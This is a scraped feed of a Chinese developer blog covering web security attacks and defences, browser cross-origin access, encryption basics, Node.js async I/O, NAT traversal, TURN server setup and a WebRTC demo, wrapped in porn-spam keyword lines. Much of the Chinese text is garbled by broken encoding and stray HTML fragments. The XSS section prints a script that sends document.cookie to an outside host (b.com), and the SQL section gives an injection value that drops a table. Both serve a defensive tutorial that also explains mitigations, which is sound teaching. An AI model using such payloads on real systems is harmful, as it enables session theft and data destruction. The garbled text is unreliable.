亚洲日本VA中文字幕久久道具,亚洲一区二区三区不卡在线播放,亚洲VA中文字幕无码毛片

Web安全技�?4)-常见的攻��d��防�M

老林 — Sat, 25 Apr 2015 07:40:00 GMT

对于一个Web应用来说�Q�可能会面��很多不同的攻凅R��下面的内容��介�l�一些常见的��d��Ҏ��Q�以及面对这些攻�ȝ��防�M手段�?/p>

一、跨站脚本攻击（XSS�Q?/h2>

跨站脚本��d��的英文全�U�是Cross Site Script�Q��ؓ了和样式表区分，�~�写为XSS。发生的原因是网站将用户输入的内容输出到��面上，在这个过�E�中可能有恶意代码被��览器执行�?/p>

跨站脚本��d��可以分�ؓ两种�Q?/p>

1). 反射型XSS

它是通过�׃��用户打开一个恶意链接，服务端将链接中参数的恶意代码渲染到页面中�Q�再传递给用户由浏览器执行�Q�从而达到攻�ȝ��目的。如下面的链接：

http://a.com/a.jsp?name=xss

a.jsp��页面渲染成下面的html�Q?/p>

Hello xss

�q�时��览器将会弹出提�C�框�?/p>

2). 持久型XSS

持久型XSS��恶意代码提交给服务器，�q�且存储在服务器端，当用戯��问相兛_��Ҏ��再渲染到��面中，以达到攻�ȝ��目的�Q�它的危��x��大�?/p>

比如�Q�攻击者写了一��带恶意JS代码的博客，文章发表后，所有访问该博客文章的用户都会执行这�D�|��意JS�?/p>

Cookie劫持

Cookie中一般保存了当前用户的登录凭证，如果可以得到�Q�往往意味着可直接进入用户帐��P��而Cookie劫持也是最常见的XSS��d��。以上面提过的反��型XSS的例子来��_��可以像下面这��h��作：

首先�׃��用户打开下面的链接：

http://a.com/a.jsp?name=xss

用户打开链接后，会加载b.js�Q��ƈ执行b.js中的代码。b.js中存储了以下JS代码�Q?/p>

var img = document.createElement("img"); img.src = "http://b.com/log?" + escape(document.cookie); document.body.appendChild(img);

上面的代码会向b.com��h��一张图片，但实际上是将当前��面的cookie发到了b.com的服务器上。这样就完成了窃取cookie的过�E��?/p>

防�MCookie劫持的一个简单的�Ҏ��是在Set-Cookie时加上HttpOnly标识�Q�浏览器��止JavaScript讉K��带HttpOnly属性的Cookie�?/strong>

XSS的防�?/h3>
1). 输入��?/strong>
对输入数据做��查，比如用户名只允许是字母和数字�Q�邮��必��L��指定格式。一定要在后台做��查，否则数据可能�l�过前端��查直接发�l�服务器。一般前后端都做��查，�q�样前端可以挡掉大部分无效数据�?/p>
对特�D�字�W�做�~�码或过滤，但因��Z��知道输出时的语境�Q�所以可能会做不适当的过滤，最好是在输出时具体情况具体处理�?/p>
2). 输出��?/strong>
�Ҏ��染到HTML中内�Ҏ��行HtmlEncode�Q�对渲染到JavaScript中的内容执行JavascriptEncode�?/p>
另外�q�可以��用一些做XSS��查的开源项目�?/p>
二、SQL注入
SQL注入常常会听刎ͼ�它与XSS�c�M��Q�是�׃��用户提交的数据被当成命��o来执行而造成的。下面是一个SQL注入的例子：
String sql = "select * from user where username = '" + username + "'";
像上面的SQL语句�Q�如果用��h��交的username参数是leo�Q�则数据库执行的SQL为：
select * from user where username = 'leo'
但如果用��h��交的username参数是leo’; drop table user–�Q�那执行的SQL为：
select * from user where username = 'leo'; drop table user--'
在查询数据后�Q�又执行了一个删除表的操作，�q�样的后果非�怸�重�?/p>
SQL注入的防�?/h3>
防止SQL注入最好的�Ҏ��是��用预�~�译语句�Q�如下面所�C�：
String sql = "select * from user where username = ?"; PreparedStatement pstmt = conn.prepareStatement(sql); pstmt.setString(1, username); ResultSet results = pstmt.executeQuery();
不同语言的预�~�译�Ҏ��不同�Q�但基本都可以处理�?/p>
如果遇到无法使用预编译方法时�Q�只能像防止XSS那样对参数进行检查和�~�码�?/p>
三、跨站请求伪造（CSRF�Q?/h2>
跨站��h��伪造的英文全称是Cross Site Request Forgery�Q�是�׃��操作所需的所有参数都能被��d��者得刎ͼ��q�而构造出一个伪造的��h��Q�在用户不知情的情况下被执行。看下面一个例子：
如果a.com�|�站需要用��L��录后可以删除博客�Q�删除博客的��h��地址如下�Q?/p>
GET http://a.com/blog/delete?id=1
当用��L��录a.com后，又打开了http://b.com/b.html�Q�其中有下面的内容：

�q�时会以用户在a.com的��n份发送http://a.com/blog/delete?id=1�Q�删除那��博客�?/p>
CSRF的防�?/h3>
验证�?/li>
CSRF是在用户不知情的情况下构造的�|�络情况�Q�验证码则强制用户与应用交互�Q�所以验证码可以很好得防止CSRF。但不能什么请求都加验证码�?/p>
referer��?/li>
��查请求header中的referer也能帮助防止CSRF��d��Q�但服务器不是总能拿到referer�Q�浏览器可能��Z��安全或隐�U�而不发送referer�Q�所以也不常用。倒是囄��防盗链中用得很多�?/p>
Anti CSRF Token
更多的是生成一个随机的token�Q�在用户提交数据的同时提交这个token�Q�服务器端比对后如果不正��，则拒�l�执行操作�?/p>
四、点��d��持（ClickJacking�Q?/h2>
点击劫持是从视觉上欺骗用戗��攻击者��用一个透明的iframe覆盖在一个网��上�Q�诱使用户在该网��上操作�Q�而实际点��d��是点在透明的iframe��面�?/p>
点击劫持延��Z��很多��d��方式�Q�有囄��覆盖��d��、拖拽劫持等�?/p>
点击劫持的防�?/h3>
针对iframe的攻击，可��用一个HTTP��_��X-Frame-Options�Q�它有三�U�可选��|��
DENY�Q?��止��M��面的frame加蝲�Q?/li>
SAMEORIGIN�Q�只有同源页面的frame可加载；
ALLOW-FROM�Q�可定义允许frame加蝲的页面地址�?/li>
针对囄��覆盖��d��Q�则注意使用预防XSS的方法，防止HTML和JS注入�?/p>

微信订阅��P��
原文地址�Q?a title="http://blog.gopersist.com/2015/04/25/web-security-4/">http://blog.gopersist.com/2015/04/25/web-security-4/

老林 2015-04-25 15:40 发表评论

Web安全技�?3)-��览器的跨域讉K��

老林 — Tue, 21 Apr 2015 16:15:00 GMT

一、浏览器介绍
对于Web应用来说�Q�浏览器是最重要的客��L��?/p>
目前��览器五花八门多得不得了�Q�除了Chrome、IE、Firefox、Safari、Opera�q�些国外的浏览器外，癑ֺ�、腾讯�?60、淘宝、搜狗、傲�怹��cȝ��Q�反正能做的都做了�?/p>
��览器虽然这么多�Q�但��览器内�怸�要就以下4�U�：
Trident�Q�IE使用的内核�?/li>
Gecko�Q�Firefox使用的内核�?/li>
WebKit�Q�Safair和Chrome使用的内核。WebKit��p��果发明，Chrome也用了，但是Google又开发了V8引擎替换掉了WebKit中的Javascript引擎�?/li>
Presto�Q�Opera使用的内核�?/li>
国内的浏览器基本都是双核��览器，使用��Z��WebKit的内栔R��速浏览常用网站，使用Trident内核兼容�|�银�{�网站�?/p>
二、同源策�?/h2>
同源�{�略是浏览器最基本的安全策略，它认��Z�Q何站点的内容都是不安全的�Q�所以当脚本�q�行�Ӟ��只被允许讉K��来自同一站点的资源�?/p>
同源是指域名、协议、端口都相同�?/p>
如果没有同源�{�略�Q�就会发生下面这��L��问题�Q?/p>
恶意�|�站用一个iframe把真实的银行��d��|��C��的页面上�Q�当用户使用用户名密码登录时�Q�父��面的javascript��可以读取到银行��d��表单中的内宏V�?/p>
甚至��览器的1个Tab��|��开了恶意网站，另一个Tab��|��开了银行网站，恶意�|�站中的javascript可以��d��到银行网站的内容。这样银行卡和密码就能被��L��拿走�?/p>
三、跨域访�?/h2>
�׃��同源�{�略的原因，��览器对跨域讉K��做了很多限制�Q�但有时我们的确需要做跨域讉K��Q�那要怎么办？主要有以下几�U�情况：
1. iframe的跨域访�?/h3>
同域名下�Q�父��面可以通过document.getElementById(‘_iframe’).contentWindow.document讉K��子页面的内容�Q�但不同域名下会出现�c�M��下面的错误：
Uncaught SecurityError: Blocked a frame with origin “http://a.com” from accessing a frame with origin “http://b.com”. Protocols, domains, and ports must match.
有两�U�解��x��法：
1). 当主域名相同�Q�子域名不同�Ӟ��比较�Ҏ��解决�Q�只需讄��相同的document.domain卛_��?/p>
如http://a.a.com/a.html使用iframe载入http://b.a.com/b.html�Q�且在a.html中有Javascript要修改b.html中元素的内容�Ӟ��可以像下面的代码那样操作�?/p>
a.html
b.html
b.html
2). 当主域名不同�Ӟ��非帔R��烦了。大致的�Ҏ��像下面描�q�的那样�Q?/p>
a.com下有a.html�Q?/li>
a.html创徏iframe加蝲b.com下的b.html�Q�可在加载b.html旉��过?�?��参��C��递到b.html中；
b.html加蝲后，可以通过提取location.search或location.hash中的内容获取a.html传过来的参数�Q?/li>
b.html创徏一个iframe�Q�加载a.com下的c.html�Q��ƈ且参��C��通过?�?传给c.html�Q?/li>
因�ؓc.html和a.html是相同域名，所以c.html可以使用parent.parent讉K��到a.html的对象，�q�样也就可以��b.html需要传递的参数传回到a.html中�?/li>
2. Ajax的跨域访�?/h3>
Ajax主要通过XMLHttpRequest对象实现�Q�但是如果通过XMLHttpRequest讉K��不同域名下的数据�Q�浏览器会出现类��g��面的错误�Q?/p>
XMLHttpRequest cannot load http://b.com/demo/iframe/ajax/b.html. No ‘Access-Control-Allow-Origin’ header is present on the requested resource. Origin ‘http://a.com’ is therefore not allowed access.
�q�时可由以下两种�Ҏ��解决�Q?/h4>
1). 使用

a.html

b.js
update_p("content from b.js");
在实际��用中�Q�通常a.html会将update_p以callback参数名传递给b.com的服务器�Q�服务器动态生成数据后�Q�再用callback参数值包��h��作�ؓ响应回传�l�a.html�?/p>
2). 在b.com的服务器�q�回信息中增加以下头信息�Q?/p>
Access-Control-Allow-Origin: http://a.com
Access-Control-Allow-Methods: GET
此时��览器便允许a.com��d��使用GET��h��b.com的内宏V�?/p>
对于flash来说�Q�会要求在网站根目录下放一个名为crossdomain.xml的文�Ӟ��以指明允许访问的域名来源。文件中的内容类��g��面的样子�Q?/em>
3. 使用HTML5的postMessage�Ҏ��实现跨域讉K��
HTML5增加了跨文档消息传输�Q�下面的例子实现了��用postMessage在不同域间传递消息：
a.html
b.html
b.html
在postMessage中要指定接收方的域名�Q�如果发现目标页面的域名不正��，��抛出类��g��面这��L��错误�Q?/p>
Failed to execute ‘postMessage’ on ‘DOMWindow’: The target origin provided (‘http://c.com’) does not match the recipient window’s origin (‘http://b.com’).
��览器对跨域讉K��的限制是��Z��安全考虑的，所以在使用一些方法实现跨域访问时要特别小心�?/em>
微信订阅��P��
源文地址�Q?a >http://blog.gopersist.com/2015/04/22/web-security-3/

老林 2015-04-22 00:15 发表评论

Web安全技�?2)-安全概述

老林 — Fri, 17 Apr 2015 15:47:00 GMT

一、安全的要素
信息安全的核心问题是要保障数据的合法使用者能够在��M��需要该数据时获得保密的�Q�没有被非法更改�q�的数据。主要有以下几要素：
机密�?/p>
保证数据内容不能泄露�?/li>
用户的密码用明文保存�Q�就破坏了机密性�?/em>
完整�?/p>
保证数据内容不被��改�?/li>
使用HTTP提交数据�Ӟ��数据在传输过�E�中被篡改后再发往服务器，��q��坏了完整性�?/em>
可用�?/p>
保证数据可被正常讉K��和��用�?/li>
像拒�l�服务攻击（DoS�Q�就是破坏了可用性�?/em>
最基本的安全要素就上面三个�Q�下面还有一些其他的�?/strong>
可审计�?/p>
记录�Ҏ��据��生的操作�Q�用于日后的分析、审查�?/li>
不可抵赖�?/p>
首先要保证数据完整性，然后�Q�在传输的数据中必须携带用于�w�䆾识别的信息，且这部分信息在不同主体间不能发生��撞�?/li>
加密技术的使用
上一��?a style="color: #1756a9; text-decoration: none;">《Web安全技�?1)-对加密机制的理解�?/a>中提��C��三类加密��法�Q�可以应用于某些要素的安全保障。如下面的说明：
对称加密
可保障机密性，�Ҏ��据加密后存储�Q�可以��没有密钥的�h员无法获取数据内宏V�?/li>
非对�U�加�?/strong>
可以�Ҏ��据进行加密解密操作，所以也能像对称加密一样保障机密性；
因�ؓ非对�U�加密可以实现数字签名，所以可以保证数据完整性。另外，�׃��是��用私钥签名，而私钥只有数据发送方才有�Q�所以如果公钥可以验�{�成功，则发送方不可抵赖�?/li>
摘要加密
摘要��法可保障数据完整性�?/p>
在某些网站的软�g下蝲��面里，有时除了下蝲地址�Q�旁边还会有一个MD5码。这个MD5��是对下载的软�g做的摘要加密。在下蝲完成后，在本机对下蝲的��Y件做MD5�Q�然后和�|�站上显�C�的MD5做比较，如果相同��p��C��Y件被成功下蝲�Q�而且下蝲�q�程中��Y件内�Ҏ��有被��改�?/em>
在做�pȝ��Ӟ��我们也经�怼�对密码做摘要加密后再保存�Q�因为摘要加密的一个特性是不可逆，�q�样通过数据库中保存的加密后的密码不可能�q�原成用��L��真实密码。而用��L��录时�Q�只需��用��h��交的密码再做摘要加密�Q�然后与数据库中保存的密码比较，��p��判断用户有没有输入正��的密码�?/em>
二、风险分�?/h2>
对于数据可能会遇��C��么威胁，一般是拍脑袋想一惻I��也可以��用模型帮忙，下面是一个叫STRIDE的威胁模型：
如何评估风险�Q?/h3>
数据受到威胁��可能造成损失�Q�但损失有大有小�Q�威胁发生的概率也有高有低，我们要结合具体情冉|��寚w��险做出判断。有一个叫DREAD的模型，可以指导我们如何判断威胁的风险程度�?/p>
每一个因素都分高、中、低三个�{��Q�权重值分别�ؓ3�?�?�?/p>
当有一个威胁时�Q�我们将它在每一个因素中的权重值相加，卛_��得出风险�p�L��?/p>
假如我们寚w��险系数范围的定义如下�Q?/p>
高危�Q?2~15分，中危�Q?~11分，低危�Q?~7分�?/p>
那如果以使用明文保存密码��Z��Q�风险系数可能像下面�q�样计算�Q?/p>
风险 = D(3) + R(1) + E(1) + A(3) + D(1) = 9分，�q�就是一个中危风险�?/p>
后箋对威胁的处理�Q�应当根据风险的大小和修复的难易�E�度做出�q��?br />
微信订阅��P��
源文地址�Q?a title="http://blog.gopersist.com/2015/04/17/web-security-2/">http://blog.gopersist.com/2015/04/17/web-security-2/

老林 2015-04-17 23:47 发表评论

Web安全技�?1)-对加密机制的理解

老林 — Mon, 13 Apr 2015 13:51:00 GMT

加密��法
数据加密��法有对�U�加密、非对称加密和信息摘要三�c�R�?/p>
对称加密是��用单个密钥对数据�q�行加密和解密。有DES、AES、RC-5�{�算法�?/p>
非对�U�加密是使用一对密�?公钥和私�?�Ҏ��据进行加密和解密。有RSA、ECC�{�算法。非对称加密大概比对�U�加密慢100倍以上�?/p>
通常的用法如下：
使用公钥加密数据�Q��用私钥解密数据�?/li>
使用�U�钥�{�֐�数据�Q��用公钥验证签名�?/li>
信息摘要如果也算加密��法的话�Q�它的加密过�E�不需要密钥，�q�且�l�过加密的数据无法被解密�Q�它是根据不定长的明文计��得��C��D�定长的数据。有MD5、SHA1�{�算法�?/p>
密钥规范
规范太多�Q�网上讲得很乱，挑常用的按我的理解列一下�?/p>
密钥格式�Q?/h4>
X.509�Q�通用的证书格式，包括公钥信息、用��h��识、签发信息等�?/li>
PKCS�pȝ��标准�Q�美国RSA数据安全公司及其合作伙伴制定的一�l�公钥密码学标准。其中PKCS#8描述�U�有密钥的信息格式，包括�U�钥及可选的属性集�{��?/li>
密钥存储�Q?/h4>
DER�Q�二�q�制�~�码�?/li>
PEM�Q�ASCII�~�码�?/li>
加密模式
块密码自�w�只能加密长度等于密码块长度的单块数据，若要对变长数据进行加密，则必��M��先将数据�q�行切分�Q�而且最后一个数据块需要适当的填充方式扩展到密码块的长度。加密模式即块密码的工作模式�Q�就是��用这些方式用同一个密钥对多于一块的数据�q�行加密�?/p>
加密模式通常用于对称加密�Q�也可以用于非对�U�加密。但非对�U�加密通常不适合加密较长的信息，所以会使用混合加密代替�?/p>
ps: 以RSA和DES��Z��Q��؜合加密通常使用DES先加密明文，再��用RSA的公钥加密DES的密钥，再将2个密文一起传递出厅R��接收方使用RSA的私钥解密DES的密钥信息，再��用DES的密钥解密具体内宏V�?/em>
最��单的加密模式是ECB�Q�即电子密码本）。其他还有CBC、PCBC、CFB�{��?/p>
ECB和CBC需要对最后一块进行填充，填充�Ҏ��有很多种�Q�最��单的是先在明文的最后填充空字符�Q��明文长度为密码块长度的整数倍�?br />
微信订阅��P��
源文地址�Q?a >http://blog.gopersist.com/2015/04/08/crypto/

老林 2015-04-13 21:51 发表评论

Node.js的异步I/O

老林 — Mon, 13 Apr 2015 13:42:00 GMT

Linux操作�pȝ��的I/O模型
JAVA的NIO引入了异步I/O�Q�而Node.js宣称的就是异步编�E�，I/O自然是异步的。其实操作系�l�在很早��引入了异步I/O的概念，如下图（摘自Unix�|�络�~�程中的囄��Q�：
我对上图的理解有几点�Q?/p>
从IO讑֤��d��数据到用户内存的整个�q�程都是��q��l�内核来完成�Q?/li>
数据��L��先被拯��到内核缓冲区�Q�再由内核缓冲区拯��到用户内存；
除了异步I/O�Q�其�?�U�I/O模型其实都是��d��的，臛_��在数据从内核拯��到用户内存时是阻塞的�Q?/li>
虽然异步I/O看上��L��理想解决�Ҏ��Q�但实现上现在用得最多的应该是多路I/O复用�Q�有select、poll、epoll的实玎ͼ�性能最好的是epoll�Q?/li>
异步I/O现在被认为有�~�陷�Q�仅支持O_DIRECT而无法支持系�l�缓存�?/li>
Node.js中的异步I/O
因�ؓ内核中的异步I/O有缺��P��现实中的异步I/O通常��q��h��的�U�程池模拟完成，如下图：
Node.js中原本��用了libeio异步I/O库，在v0.9.3后改��己实现的�U�程池来完成异步I/O。所以在Node.js中，除了用户的Javascript代码是单�U�程外，所有I/O都是多线�E��ƈ行执行的�?/p>
Node.js中的异步I/O调用
Node.js通过事�g循环的模式运行，在每一个��@环的�q�程中，通过询问一个或多个观察者来判断是否有事件要处理�Q�而观察者可以有文�gI/O观察者、网�l�I/O观察者等�?/p>
Node.js中异步I/O调用的大致流�E�如下：
发�vI/O调用
用户通过Javascript代码调用Node核心模块�Q�将参数和回调函��C��入到核心模块�Q?/li>
Node核心模块会将传入的参数和回调函数��装成一个请求对象；
��这个请求对象推入到I/O�U�程池等待执行；
Javascript发�v的异步调用结束，Javascript�U�程�l�箋执行后箋操作�?/li>
执行回调
I/O操作完成后，会将�l�果储存到请求对象的result属性上�Q��ƈ发出操作完成的通知�Q?/li>
每次事�g循环时会��查是否有完成的I/O操作�Q�如果有��将��h��对象加入到I/O观察者队列中�Q�之后当做事件处理；

处理I/O观察者事件时�Q�会取出之前��装在请求对象中的回调函敎ͼ�执行�q�个回调函数�Q��ƈ��result当参敎ͼ�以完成Javascript回调的目的�?br />
微信订阅��P��
源文地址�Q?a title="作者博客：http://blog.gopersist.com">
http://blog.gopersist.com/2015/03/09/aio/

老林 2015-04-13 21:42 发表评论

老林 — Thu, 23 Oct 2014 06:17:00 GMT

我们看看不同NAT之间的NAT打洞。NAT打洞需要Server配合�Q�需�?�U�Server�Q?/div>
1. �c�M��WebRTC中的信��o服务器，作用是帮助客��h��沟通IP和PORT信息�Q?/div>
2. STUN Server�Q�用来让客户机判断自己所在的NAT环境�?/div>
现在假设客户端和Server的通讯都没问题�Q�客��L��知道自己所处环境，�q�且��自��q��信息通过服务器发送给了另一方客��L��Q�它们可能的打洞情况如下�Q?/div>
1. Full Cone NAT �?Full Cone NAT�Q�通讯很容易，各自通过STUN Server获取外部IP和Port后，通过信��o服务器通知另一方，卛_��通讯�?/div>
2. Full Cone NAT �?Restricted Cone NAT或Port Restricted Cone NAT在互相告知IP和Port后，如果由Full Cone NAT端先发送数据包�Q�会��p�|�Q�必��ȝ��Restricted Cone NAT或Port Restricted Cone NAT端先发送数据包�l�Full Cone NAT�Q�之后双方即可互盔R��讯�?/div>
3. Full Cone NAT �?Symmetric NAT通讯�Ӟ��必须先由Symmetric NAT端发送数据包�l�Full Cone NAT端，Full Cone NAT端通过发来的数据包获得目标的新端口��P��之后通过�q�个新端口号完成互相通讯�?/div>
4. Restricted Cone NAT �?Restricted Cone NAT、Restricted Cone NAT �?Port Restricted Cone NAT、Port Restricted Cone NAT �?Port Restricted Cone NAT之间通讯�Ӟ��先发送数据包的一方会��p�|�Q�之后另一方发送数据包成功后，可互盔R��讯�?/div>
5. Restricted Cone NAT �?Symmetric NAT通讯�Ӟ��先由Restricted Cone NAT发送数据包�l�Symmetric NAT�Q�发送数据会��p�|�Q�只是�ؓ了下�ơ能接收从Symmetric NAT端发送过来的数据包。然后由Symmetric NAT发送数据包到Restricted Cone NAT端，Restricted Cone NAT端会收到数据包，�q�且��新的端口号��C��Q��用新的端口号可与Symmetric NAT端通讯�?/div>
6. Port Restricted Cone NAT �?Symmetric NAT通讯�Ӟ��׃��Port Restricted Cone NAT会对IP:PORT对进行限�Ӟ��所以当Symmetric NAT端��用新PORT发来数据包时�Q�Port Restricted Cone NAT端收不到�Q�它们之间无法通讯�?/div>
7. Symmetric NAT �?Symmetric NAT也无法通讯 �?/div>

老林 2014-10-23 14:17 发表评论

针对UDP数据�?�U�NAT行�ؓ

老林 — Thu, 23 Oct 2014 05:56:00 GMT

针对收发UDP数据�Q�NAT可分为Full Cone、Restricted Cone、Port Restricted Cone、Symmetric NAT四类�Q�在RFC3489中有定义(http://datatracker.ietf.org/doc/rfc3489/?include_text=1)�?/div>
1. Full Cone�Q�所有从相同的内部IP和PORT发出的请求都映射为相同的外部IP和PORT�Q�而后��M��外部��L��只要发送数据包�l�NAT的IP和PORT��׃��被�{发给内部��L��?/div>
从图中可以看刎ͼ�只要内部��L��通过NAT讉K��了一�ơ外部主机，在Mapping Table中会增加一条内部IP:Port映射到NAT的端口，那么外部的�Q何主机都可以通过NAT的IP:PORT��数据发�l�内部主机�?/div>
2. Restricted Cone�Q�所有从相同的内部IP和PORT发出的请求都映射为相同的外部IP和PORT�Q�但只有内部��L��曑֏�送过数据的外部IP才可��数据包通过NAT的IP:PORT发给内部��L��?/div>
从图中可以看刎ͼ�因�ؓ内部��L��没有发过数据包给外部��L��B�Q�所以外部主机发到NAT的数据包无法发给内部��L��?/div>
3. Port Restricted Cone�Q�和Restricted Cone�c�M��Q�但是除了IP的限制外增加了PORT的限�Ӟ��卛_��有内部主机曾发送过数据的外部IP:PORT才可��数据包通过NAT的IP:PORT发给内部��L��?/div>
从图中可以看刎ͼ�外部��L��1用另一个PORT无法��数据发到内部主机�?/div>
4. Symmetric NAT�Q�从内部��L��相同的IP和PORT发出的请求，当访问不同外部IP和PORT�Ӟ��都会在NAT上创��Z��同的映射�?/div>
上图中虽然内部IP和PORT相同�Q�但讉K��不同的外部IP/PORT对，都会映射��Z��同的NAT PORT。当外部��L��发数据包�l�内部主机时�Q�也只能使用对应的PORT�?/div>

老林 2014-10-23 13:56 发表评论

Ubuntu下安装TURN Server (rfc5766-turn-server)

老林 — Wed, 22 Oct 2014 06:23:00 GMT

在��用WebRTC�q�行��x��通讯�Ӟ��需要�ɋ��览器进行P2P通讯�Q�但是由于NAT环境的复杂性，�q�不是所有情况下都能�q�行P2P�Q�这旉��要TURN Server来帮助客��L��之间转发数据。rfc5766-turn-server是一个高性能的开源TURN Server实现�?/div>
以下是在EC2上��用Ubuntu操作�pȝ��安装rfc5766-turn-server�Q?/div>
1. 下蝲安装包：
$ wget http://ftp.cn.debian.org/debian/pool/main/r/rfc5766-turn-server/rfc5766-turn-server_3.2.4.4-1_amd64.deb
2. 安装�Q?/div>
$ sudo apt-get update
$ sudo apt-get install gdebi-core
$ sudo gdebi rfc5766-turn-server_3.2.4.4-1_amd64.deb
安装完后�Q�在/usr/share/doc/rfc5766-turn-server下有很多文档可参考�?/em>
3. 配置�Q?/div>
$ sudo vi /etc/turnserver.conf
---------------------------------------
// 配置IP�Q�EC2下需要配�|�listening-ip和external-ip
listening-ip=172.31.4.37
external-ip=54.223.149.60
// 当TURN Server用于WebRTC�Ӟ��必须使用long-term credential mechanism
lt-cred-mech
// 增加一个用�?/div>
user=username1:password1
// 讑֮�realm
realm=mycompany.org
---------------------------------------
4. 启动�Q?/div>
sudo turnserver -c /etc/turnserver.conf --daemon
5. 服务启动后，在上一个WebRTC�C�Z��中更改iceServers后测试：
"iceServers": [{
"url": "stun:stun.l.google.com:19302"
}, {
"url": "turn:54.223.149.60",
"username": "username1",
"credential": "password1"
}]
更多安装信息在：http://turnserver.open-sys.org/downloads/v3.2.4.4/INSTALL
rfc5766-turn-server当然也有STUN Server的能力，但是需要给它配�|?个IP�Q�以帮助探测客户端所在NAT环境的行为，�q�里没有做�?/div>

老林 2014-10-22 14:23 发表评论

最��单的WebRTC�C�Z��

老林 — Tue, 21 Oct 2014 09:21:00 GMT
在学习WebRTC�Ӟ��|�上的示例大多代码较多，以下是参考那些代码简化的一个WebRTC一对一的示例，在chrome 37下测试通过。其中iceServer可省略，没有iceServer时在同一个局域网下仍可通讯�?br />
客户端代码：
<html>
<body>
    Local: <br>
    <video id="localVideo" autoplay>video><br>
    Remote: <br>
    <video id="remoteVideo" autoplay>video>

    <script>
        // 仅仅用于控制哪一端的��览器发起offer�Q?号后面有值的一方发�?/span>
        var isCaller = window.location.href.split('#')[1];

        // 与信令服务器的WebSocket�q�接
        var socket = new WebSocket("ws://127.0.0.1:3000");

        // stun和turn服务�?/span>
        var iceServer = {
            "iceServers": [{
                "url": "stun:stun.l.google.com:19302"
            }, {
                "url": "turn:numb.viagenie.ca",
                "username": "webrtc@live.com",
                "credential": "muazkh"
            }]
        };

        // 创徏PeerConnection实例 (参数为null则没有iceserver�Q�即使没有stunserver和turnserver�Q�仍可在局域网下通讯)
        var pc = new webkitRTCPeerConnection(iceServer);

        // 发送ICE候选到其他客户�?/span>
        pc.onicecandidate = function(event){
            if (event.candidate !== null) {
                socket.send(JSON.stringify({
                    "event": "_ice_candidate",
                    "data": {
                        "candidate": event.candidate
                    }
                }));
            }
        };

        // 如果��到媒体��连接到本地�Q�将其绑定到一个video标签上输�?/span>
        pc.onaddstream = function(event){
            document.getElementById('remoteVideo').src = URL.createObjectURL(event.stream);
        };

        // 发送offer和answer的函敎ͼ�发送本地session描述
        var sendOfferFn = function(desc){
            pc.setLocalDescription(desc);
            socket.send(JSON.stringify({
                "event": "_offer",
                "data": {
                    "sdp": desc
                }
            }));
        },
        sendAnswerFn = function(desc){
            pc.setLocalDescription(desc);
            socket.send(JSON.stringify({
                "event": "_answer",
                "data": {
                    "sdp": desc
                }
            }));
        };

        // 获取本地音频和视频流
        navigator.webkitGetUserMedia({
            "audio": true,
            "video": true
        }, function(stream){
            //�l�定本地媒体��到video标签用于输出
            document.getElementById('localVideo').src = URL.createObjectURL(stream);
            //向PeerConnection中加入需要发送的��?/span>
            pc.addStream(stream);
            //如果是发��h��则发送一个offer信��o
            if(isCaller){
                pc.createOffer(sendOfferFn, function (error) {
                    console.log('Failure callback: ' + error);
                });
            }
        }, function(error){
            //处理媒体��创建失败错�?/span>
            console.log('getUserMedia error: ' + error);
        });

        //处理到来的信�?/span>
        socket.onmessage = function(event){
            var json = JSON.parse(event.data);
            console.log('onmessage: ', json);
            //如果是一个ICE的候选，则将其加入到PeerConnection中，否则讑֮��Ҏ��的session描述��Z��递过来的描述
            if( json.event === "_ice_candidate" ){
                pc.addIceCandidate(new RTCIceCandidate(json.data.candidate));
            } else {
                pc.setRemoteDescription(new RTCSessionDescription(json.data.sdp));
                // 如果是一个offer�Q�那么需要回复一个answer
                if(json.event === "_offer") {
                    pc.createAnswer(sendAnswerFn, function (error) {
                        console.log('Failure callback: ' + error);
                    });
                }
            }
        };
    script>
body>
html>

实现WebRTC�Ӟ��信��o服务器是必须的，它帮助客��L��之间�q�行沟通�?br />�q�里使用Node.js的ws模块来实��C��个WebSocket服务作�ؓ信��o服务器。另外��用express模块让它提供html��面的访问�?br />server.js代码如下�Q?br />
var express = require('express'),
app = express(),
server = require('http').createServer(app);

server.listen(3000);

app.get('/', function(req, res) {
    res.sendfile(__dirname + '/webrtc.html');
});

var WebSocketServer = require('ws').Server,
wss = new WebSocketServer({server: server});

// 存储socket的数�l�，�q�里只能�?个socket�Q�每�ơ测试需要重启，否则会出�?/span>
var wsc = [],
index = 1;

// 有socket�q�入
wss.on('connection', function(ws) {
    console.log('connection');

    // ��socket存入数组
    wsc.push(ws);

    // ��C��Ҏ��socket在数�l�中的下标，因�ؓ�q�个��试�E�序只允�?个socket
    // 所以第一个连入的socket存入0�Q�第二个�q�入的就是存�?
    // otherIndex��反着来，�W�一个socket的otherIndex下标�?�Q�第二个socket的otherIndex下标�?
    var otherIndex = index--,
    desc = null;

    if (otherIndex == 1) {
        desc = 'first socket';
    } else {
        desc = 'second socket';
    }

    // 转发收到的消�?/span>
    ws.on('message', function(message) {
        var json = JSON.parse(message);
        console.log('received (' + desc + '): ', json);

        wsc[otherIndex].send(message, function (error) {
            if (error) {
                console.log('Send message error (' + desc + '): ', error);
            }
        });
    });
});

使用npm安装需要的模块后��用node server.js启动服务�?br />��试时��用Chrome��览器：
�W�一个浏览器�H�口讉K��面�Q�http://127.0.0.1:3000�Q�在弹出的提�C�Z��允许使用摄像头和麦克风�?br />�W�二个浏览器�H�口讉K��面�Q�http://127.0.0.1:3000#true�Q?true表示它是一个发��h��Q�在弹出的提�C�Z��同样允许使用摄像头和麦克风�?br />�q�时��面中应当可以看�?个画面，一个是本地的，一个是�q�端的�?br />
��代码中的IP�E�做调整后部�|�到外网�Q�即可在2个不同的地点讉K��q�个��面�q�行实时通讯�?br />

微信订阅��P��
源文地址�Q?a >http://blog.gopersist.com/2014/10/21/webrtc-simple/

老林 2014-10-21 17:21 发表评论

亚洲日本VA中文字幕久久道具,亚洲一区二区三区不卡在线播放,亚洲VA中文字幕无码毛片

Web安全技�?4)-常见的攻��d��防�M

Cookie劫持

二、SQL注入

Web安全技�?3)-���览器的跨域讉K��

一、浏览器介绍

三、跨域访�?/h2>�׃��同源�{�略的原因，���览器对跨域讉K��做了很多限制�Q�但有时我们的确需要做跨域讉K���Q�那要怎么办？主要有以下几�U�情况：

有两�U�解��x��法：

3. 使用HTML5的postMessage�Ҏ��实现跨域讉K��

Web安全技�?2)-安全概述

一、安全的要素

加密技术的使用

Web安全技�?1)-对加密机制的理解

加密���法

密钥规范

密钥存储�Q?/h4>DER�Q�二�q�制�~�码�?/li>PEM�Q�ASCII�~�码�?/li>

加密模式

Node.js的异步I/O

Linux操作�pȝ��的I/O模型

Node.js中的异步I/O

